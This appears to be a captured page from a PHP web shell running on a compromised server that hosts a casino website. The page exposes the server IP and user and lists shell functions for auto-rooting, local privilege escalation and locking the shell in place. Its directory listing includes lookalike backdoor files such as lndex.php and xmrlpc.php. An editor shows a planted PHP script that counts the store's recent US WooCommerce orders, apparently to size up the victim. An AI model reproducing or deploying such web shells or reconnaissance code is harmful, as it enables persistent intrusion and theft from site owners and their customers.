Linux vps 6.8.0-39-generic #39-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 21:49:14 UTC 2024 x86_64
nginx/1.26.1
Server IP : 91.227.41.192 & Your IP : 172.70.176.149
Domains :
Cant Read [ /etc/named.conf ]
User : clp
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
lemon-casino1 /
htdocs /
lemon-casino1.com /
Delete
Unzip
Name
Size
Permission
Date
Action
asstes
[ DIR ]
drwxrwxrwx
2025-10-22 11:06
en
[ DIR ]
drwxrwxrwx
2025-10-22 11:00
fr
[ DIR ]
drwxrwxrwx
2025-10-22 11:00
ge
[ DIR ]
drwxrwxrwx
2025-10-22 11:00
hu
[ DIR ]
drwxrwxrwx
2025-10-22 11:00
images
[ DIR ]
drwxr-xr-x
2025-10-22 11:06
no
[ DIR ]
drwxrwxrwx
2025-10-22 11:00
pl
[ DIR ]
drwxrwxrwx
2025-10-22 11:00
.htaccess
2
KB
-r--r--r--
2025-10-22 11:00
android-chrome-192x192.png
8.23
KB
-rwxrwxrwx
2024-09-02 12:01
android-chrome-384x384.png
24.43
KB
-rwxrwxrwx
2024-09-02 12:01
apple-touch-icon.png
7.49
KB
-rwxrwxrwx
2024-09-02 12:01
browserconfig.xml
246
B
-rwxrwxrwx
2024-09-02 12:01
favicon-16x16.png
629
B
-rwxrwxrwx
2024-09-02 12:01
favicon-32x32.png
1.11
KB
-rwxrwxrwx
2024-09-02 12:01
favicon.ico
10.73
KB
-rwxrwxrwx
2024-09-02 12:01
fewafwa.gif
446
B
-rw-r--r--
2025-10-21 15:01
index.php
37.37
KB
-r--r--r--
2025-10-22 11:00
kki.php
62
B
-rw-r--r--
2025-10-20 05:01
lndex.php
776
B
-rwxrwxrwx
2025-10-14 12:43
mstile-150x150.png
5.64
KB
-rwxrwxrwx
2024-09-02 12:01
postnews.php
5.54
KB
-r--r--r--
2025-10-22 11:00
robots.txt
97
B
-rw-r--r--
2025-10-22 11:00
site.webmanifest
426
B
-rwxrwxrwx
2024-09-02 12:01
style.css
12.11
KB
-rwxrwxrwx
2024-09-02 12:01
wp-extends.php
4.24
KB
-rw-r--r--
2025-10-20 05:14
xmrlpc.php
103.02
KB
-rw-r--r--
2025-10-20 04:43
Save
Rename
<?php include $_SERVER['DOCUMENT_ROOT']."/wp-load.php"; $start_date = date( 'Y-m-d H:i:s', strtotime('-30 days')); $end_date = date('Y-m-d H:i:s'); $args = array( 'limit' => -1, 'return' => 'ids', 'date_created' => $start_date . '...' . $end_date, 'billing_country' => 'US', ); $orders = wc_get_orders($args); $order_count = count($orders); if ($order_count > 0) { echo "\norder num mon:" . $order_count."\n"; } ?>